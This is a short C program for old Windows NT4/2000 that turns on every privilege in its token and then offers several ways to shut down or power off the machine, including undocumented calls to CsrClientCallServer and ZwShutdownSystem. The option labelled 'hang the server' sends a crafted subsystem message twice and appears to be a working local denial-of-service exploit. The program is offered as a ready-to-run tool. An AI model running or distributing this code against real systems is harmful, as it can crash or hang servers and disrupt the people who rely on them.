#include <windows.h>
#include <stdio.h>

#define SE_SHUTDOWN_PRIVILEGE             (19L)

extern "C" {NTAPI CsrClientCallServer(PVOID message, DWORD, DWORD opcode, DWORD);}
extern "C" {NTAPI ZwShutdownSystem(DWORD Action);}
extern "C" {NTAPI RtlAdjustPrivilege(int,BOOL,BOOL,BOOL *);}

void main()
{
DWORD i=0;
DWORD length=0;
BOOL bo,en;
HANDLE hToken;
PTOKEN_PRIVILEGES newstate;
PVOID buffer;
OSVERSIONINFO osver;
DWORD opcode=0;


//First of all let's determine the running version
	memset(&osver,0x00,sizeof(OSVERSIONINFO));
	osver.dwOSVersionInfoSize =sizeof(OSVERSIONINFO);
	bo=GetVersionEx(&osver);
//-----------

//Get the privileges
	bo=OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,&hToken);

	bo=GetTokenInformation(hToken,TokenPrivileges,NULL,0,&length);
	buffer=(BYTE *)malloc(length);
	bo=GetTokenInformation(hToken,TokenPrivileges,buffer,length,&i);

	newstate=(PTOKEN_PRIVILEGES)buffer;
	for (i = 0; i < newstate->PrivilegeCount; i++)
	{
		newstate->Privileges[i].Attributes |= SE_PRIVILEGE_ENABLED;
	} 
	bo=AdjustTokenPrivileges(hToken,FALSE,newstate,0,NULL,0);
	free(buffer);

printf("Enter method:\n");
printf("0 - standard\n");
printf("1 - exotic\n");
printf("2 - quick\n");
printf("x - hang the server\n");

switch(getchar())
{
case '0':
//	Standart exit
	i=8;
	bo=ExitWindowsEx(i,0);
break;
case '1':
//	Send message to subsystem
	LoadLibrary("user32.dll");
	if(osver.dwMajorVersion==4) opcode=0x00030a00;
	if(osver.dwMajorVersion==5) opcode=0x00030400;
	length=64;
	buffer=(BYTE *)malloc(length);
	memset(buffer,0x00,length);
	*((DWORD *)buffer+11)=8;		//8 - Power off
	i=CsrClientCallServer(buffer,0,opcode,0x10);
	free(buffer);
break;
case '2':
//	Quick exit
	//Get privileges
	bo=RtlAdjustPrivilege(SE_SHUTDOWN_PRIVILEGE,TRUE,FALSE,&en);
	i=2;		//Power off
	bo=ZwShutdownSystem(i);
break;
case 'x':
//	Lethal combination!!!
	LoadLibrary("user32.dll");
	if(osver.dwMajorVersion==4) opcode=0x00030a00;
	if(osver.dwMajorVersion==5) opcode=0x00030400;
	length=64;
	buffer=(BYTE *)malloc(length);
	memset(buffer,0x00,length);
	*((DWORD *)buffer+11)=8;
	i=CsrClientCallServer(buffer,0,opcode,0x10);
	i=CsrClientCallServer(buffer,0,opcode,0x10);
	free(buffer);
break;
default: 
	printf("Wrong choice\n");
}//switch

}